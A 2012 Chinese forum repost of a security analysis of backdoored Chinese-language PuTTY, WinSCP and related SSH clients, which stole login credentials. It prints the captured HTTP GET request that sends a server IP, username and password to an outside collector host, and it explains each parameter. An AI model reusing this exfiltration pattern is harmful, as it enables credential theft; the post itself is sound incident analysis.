免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1900 | 回复: 0
打印 上一主题 下一主题

中文版putty后门事件分析 [复制链接]

论坛徽章:
1
IT运维版块每日发帖之星
日期:2015-08-23 06:20:00
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2012-02-02 09:22 |只看该作者 |倒序浏览
本帖最后由 kaduo521 于 2012-02-02 09:23 编辑

  近日,中文版putty等SSH远程管理工具被曝出存在后门,该后门会自动窃取管理员所输入的SSH用户名与口令,并将其发送至指定服务器上。根据分析,此次事件涉及到来自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站点的中文版putty、WinSCP、SSHSecure和sftp等软件,而这些软件的英文版本不受影响。

  事件回放:

  1月25日:新浪微博有网友发布消息称putty和winscp中装有后门程序,但该条微博并未提及后门程序的类型及其技术细节,而且消息也未被过多的人所重视,目前无法确定该条微博是否与此次事件有关联:

  1月30日下午16点左右:互联网上再度出现关于中文版putty等SSH管理软件被装有后门的消息,并且此消息对后门的行为特征进行了简要的描述 —— 该程序会导致root密码丢失,但发布者仍未披露具体的技术细节:
  以上微博的短URL所对应的文章截图如下:
  1月31日:经过一晚的酝酿,putty事件开始在互联网上广泛传播,微博、论坛等信息发布平台上开始大量出现putty后门事件的消息,同时,很多技术人员也开始对含有后门的putty等SSH管理软件进行技术分析,并陆续发布其中的技术细节。

  事件分析:

  1、问题软件源头

  据知道创宇安全研究团队对putty等软件的跟踪分析发现,来自以下几个站点的中文版putty、WinSCP、SSHSecure和sftp等软件都可能存在后门程序:
http://www.putty.org.cn
http:
//www.putty.ws
http:
//www.winscp.cc
http:
//www.sshsecure.com

  2、行为分析

  网络行为分析
  使用带有后门程序的中文版putty等SSH管理软件连接服务器时,程序会自动记录登录时的用户名、密码和服务器IP地址等信息,并会以HTTP的方式将这些信息发送到指定的服务器上,以下是在分析过程中抓取到的原始HTTP数据:
GET /yj33/js2.asp?act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY HTTP/1.1
User
-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Host: l.ip
-163.com:88
Pragma: no
-cache

  从以上数据可以获得以下信息:
  1. 敏感信息通过HTTP GET的方式发送到服务器l.ip-163.com上(经测试,该域名与putty.org.cn位于同一IP地址上)
  2. 用于收集密码的程序地址为http:// l.ip-163.com:88/yj33/js2.asp
  3. 敏感信息以GET参数的方式发送到服务器上,相关参数为:
  act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=PuTTY
  每个字段的作用如下:
    • act为执行的动作,参数add用于添加信息,经测试,也可使用del来删除信息
    • user为SSH服务器的IP地址,此处为50.23.79.188
    • pwd为连接服务器时的登录用户名,此处为abc
    • ll1为登录密码,此处为pass
    • ll2为目标服务器的SSH端口,此处为22(即,默认端口)
    • ll3则为客户端类型,此处为PuTTY
  服务器本地文件分析
  知道创宇安全研究团队借助文件完整性校验的方式,对服务器初始安全状态下的/etc、/lib、/usr、/bin等敏感目录进行了完整性备份,并在putty连接测试后对这些目录的文件变更、丢失和添加等情况进行了校验,校验结果显示,中文版putty并未对服务器自动安装后门程序。
  网络上部分消息称,有些使用中文版putty进行过远程管理的服务器上出现恶意代码和文件,可能是由于恶意用户获取了putty所收集的密码后人为植入所致。

  3、事件后续

  截止至2月1日,在本次事件中所涉及的以下域名均已不能访问:
http://www.putty.org.cn
http:
//putty.ws
http:
//www.winscp.cc
http:
//www.sshsecure.com
http:
//l.ip-163.com:88

  但是,在1月31日晚,网络上传出“l.ip-163.com被黑”的消息并配有一张“受害者列表”的截图:

  而就在此消息发布不久之后,互联网上便出现了完整的受害者列表供所有用户浏览和下载,根据这份来自互联网列表的显示,不但有众多政府网站位列其中,IBM、Oracle、HP等大厂商的服务器也出现在列表内。

  原文链接:http://safe.it168.com/a2012/0201/1305/000001305829.shtml
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP